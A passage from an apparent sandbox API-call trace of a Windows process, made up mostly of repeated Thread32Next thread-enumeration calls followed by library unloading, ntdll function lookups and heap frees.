(hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.359] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.360] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.361] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.361] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.362] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.363] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.364] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.364] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.365] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.366] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.367] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.367] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.368] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.369] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.369] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.370] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.371] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.371] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.372] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.373] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.373] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.374] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.375] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.375] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.376] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.377] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.378] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.379] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.379] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.380] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.381] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.381] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.382] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.383] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.383] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.384] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.384] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.385] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.386] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.386] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.387] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.388] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.388] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.389] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.390] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.390] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.391] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.392] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.542] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.542] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.543] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.544] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.545] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.545] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.546] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.547] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.548] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.549] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.550] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.551] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.552] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.553] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.554] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.554] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.555] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.556] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.557] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.557] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.558] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.559] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.560] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.561] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.562] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.563] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.563] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.564] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.565] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.566] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.567] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.568] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.569] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.569] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.570] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.571] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.572] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.573] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.574] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.575] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.575] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.705] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.706] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.707] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.708] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.709] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.710] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.711] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.712] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.712] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.713] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.714] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.714] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.715] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.716] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.716] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.717] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.718] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.718] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.719] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.720] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.721] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.721] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.722] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.723] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.723] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.724] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.725] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.725] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.726] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.727] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.727] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.728] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.730] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.731] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.732] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.733] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.733] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.734] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.735] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.735] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.736] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.737] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.738] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.738] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.739] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.739] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.906] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.907] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.908] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.909] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.909] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.910] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.911] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.912] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.913] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.914] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.915] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.916] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.916] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.917] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.918] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.919] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.920] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.921] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.921] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.922] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.923] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.924] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.925] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.926] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.926] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.927] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.928] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.928] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.929] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.930] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.931] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.931] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.932] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.933] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.934] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.935] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.935] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.936] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.937] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.937] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.938] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.939] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.939] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.940] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.941] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.076] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.077] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.078] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.078] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.079] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.080] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.081] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.081] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.082] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.083] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.083] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.084] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.085] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.086] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.086] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.087] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.088] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.089] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.090] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.090] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.091] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.092] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.093] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.093] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.094] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.095] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.096] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.097] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.097] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.098] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.099] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.100] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.101] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.101] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.102] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.103] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.104] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.105] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.105] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.106] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.107] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.107] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.108] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.109] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.110] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.110] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.111] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.281] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.282] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.283] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.284] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.285] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.286] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.287] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.288] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.289] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.290] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.291] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.292] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.293] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.294] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.294] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.295] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.296] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.297] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.298] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.299] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.300] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.301] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.302] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.303] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.304] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.305] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.307] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.308] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.309] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.310] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.311] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.311] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.312] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.314] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.314] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.315] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.316] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.317] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.477] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.478] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.479] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.480] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.481] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.482] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.484] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.484] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.485] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.486] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.487] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.487] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.489] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.490] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.490] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.492] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.492] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.493] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.494] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.496] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.496] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.498] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.498] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.499] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.500] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.501] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.502] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.503] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.504] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.505] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.506] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.506] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.696] FreeLibrary (hLibModule=0x7ffc45e90000) returned 1 [0281.703] GetModuleHandleA (lpModuleName="NTDLL.dll") returned 0x7ffc5f810000 [0281.703] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnprintf") returned 0x7ffc5f8a6970 [0281.703] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnwprintf") returned 0x7ffc5f8a6a40 [0281.703] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memset") returned 0x7ffc5f8bb580 [0281.704] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memcpy") returned 0x7ffc5f8bb240 [0281.705] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memmove") returned 0x7ffc5f8bb240 [0281.706] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x5770c0 | out: hHeap=0x560000) returned 1 [0281.707] RtlInterlockedFlushSList (in: ListHead=0x7ffc45fcd4a0 | out: ListHead=0x7ffc45fcd4a0) returned 0x0 [0281.707] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x56b410 | out: hHeap=0x560000) returned 1 [0281.707] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x5698b0 | out: hHeap=0x560000) returned 1 [0281.707] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x564b10 | out: hHeap=0x560000) returned 1 [0281.707] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x570970 | out: hHeap=0x560000) returned 1 [0281.707] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x564b50 | out: hHeap=0x560000) returned 1 [0281.707] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x564060 | out: hHeap=0x560000) returned 1 [0281.707] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x56b980 | out: hHeap=0x560000) returned 1 [0281.707] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x569be0 | out: hHeap=0x560000) returned 1 [0281.707] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x56b560 | out: hHeap=0x560000) returned 1 [0281.707] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x564b90 | out: hHeap=0x560000) returned 1 [0281.707] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x564bd0 | out: hHeap=0x560000) returned 1 [0281.708] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x5625e0 | out: hHeap=0x560000) returned 1 [0281.708] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x563e90 | out: hHeap=0x560000) returned 1 [0281.708] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x563eb0 | out: hHeap=0x560000) returned 1 [0281.708] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x56ff20 | out: hHeap=0x560000) returned 1 [0281.708] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x56b590 | out: hHeap=0x560000) returned 1 [0281.708] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x570e20 | out: hHeap=0x560000) returned 1 [0281.708] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x563f30 | out: hHeap=0x560000) returned 1 [0281.708] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x563f50 | out: hHeap=0x560000) returned 1 [0281.708] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x56b230 | out: hHeap=0x560000) returned 1 [0281.708] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x56b5c0 | out: hHeap=0x560000) returned 1 [0281.708] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x5783a0 | out: hHeap=0x560000) returned 1 [0281.708] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x56b5f0 | out: hHeap=0x560000) returned 1 [0281.708] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x56b9f0 | out: hHeap=0x560000) returned 1 [0281.708] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x56ba70 | out: hHeap=0x560000) returned 1 [0281.708] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x56ba90 | out: hHeap=0x560000) returned 1 [0281.708] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x56bab0 | out: hHeap=0x560000) returned 1 [0281.708] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x5781a0 | out: hHeap=0x560000) returned 1 [0281.708] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x5785a0 | out: hHeap=0x560000) returned 1 [0281.708] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x5791b0 | out: hHeap=0x560000) returned 1 [0281.708] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x56b7d0 | out: hHeap=0x560000) returned 1 [0281.708] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x579250 | out: hHeap=0x560000) returned 1 [0281.708] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x56b620 | out: hHeap=0x560000) returned 1 [0281.709] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x579350 | out: hHeap=0x560000) returned 1 [0281.709] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x569ea0 | out: hHeap=0x560000) returned 1 [0281.709] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x5643d0 | out: hHeap=0x560000) returned 1 [0281.710] 